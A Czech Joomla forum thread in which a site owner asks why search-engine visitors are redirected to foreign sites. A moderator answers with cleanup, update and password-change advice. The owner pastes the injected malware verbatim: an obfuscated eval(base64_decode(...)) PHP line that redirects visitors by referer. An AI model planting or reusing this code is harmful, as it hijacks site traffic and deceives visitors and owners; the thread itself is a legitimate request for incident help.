Joomla 5.2.2 Security & Bugfix Release
Joomla 5.2.2 je nyní k dispozici. Jedná se o bezpečnostní vydání pro Joomla 5.x.
Hacking joomla: Přesměrování když hledám z googlu
05. srp 2012 16:26 #96076
Prosim o radu.
V poslední době nám někdo napadá stránky způsobem tak, že všechno jede v pořádku, ale pokud dám vyhledat stránky na google a jdu na ně z google, tak se to přesměruje na nějaký adresy z polska, nebo ruska.
Pokud na ně jdu přímo, tak je vše v pořádku. V každém souboru pak je:
Je to problém joomla 2.5 (zabezpečení), nebo serveru?
Díky
V poslední době nám někdo napadá stránky způsobem tak, že všechno jede v pořádku, ale pokud dám vyhledat stránky na google a jdu na ně z google, tak se to přesměruje na nějaký adresy z polska, nebo ruska.
Pokud na ně jdu přímo, tak je vše v pořádku. V každém souboru pak je:
Code:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3LmlzZmFydC5mYXJ0aXQuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));
Je to problém joomla 2.5 (zabezpečení), nebo serveru?
Díky
05. srp 2012 18:45 - 05. srp 2012 18:47 #96077
I'm sorry, my responses are limited...you must ask the right questions.
Odpověď od Bong
Moderátor
V zabezpečení Joomly bych chybu nehledal, tedy pokud jste si nehráli se zabezpečením.
Co je to za stránky? Hosting? Nainstalované komponenty? Jak dlouho stránky fungují? používáte FTP klienta TC?... Tyto a podobné otázky mohou napovědět, jak se k vám útočník dostal... informace máte i v logu stránek.
Vyčistěte Joomlu, aktualizujte na poslední verzi, prověřte všechna rozšíření, zda neobsahují chyby a aktualizujte je, změňte všechna hesla do administrace Joomly, hesla do administrace hostingu a hesla k FTP.
Na těchto stránkách hledejte a čtěte www.joomlaportal.cz/index.php/forum/advs...name=1&childforums=1
Co je to za stránky? Hosting? Nainstalované komponenty? Jak dlouho stránky fungují? používáte FTP klienta TC?... Tyto a podobné otázky mohou napovědět, jak se k vám útočník dostal... informace máte i v logu stránek.
Vyčistěte Joomlu, aktualizujte na poslední verzi, prověřte všechna rozšíření, zda neobsahují chyby a aktualizujte je, změňte všechna hesla do administrace Joomly, hesla do administrace hostingu a hesla k FTP.
Na těchto stránkách hledejte a čtěte www.joomlaportal.cz/index.php/forum/advs...name=1&childforums=1
I'm sorry, my responses are limited...you must ask the right questions.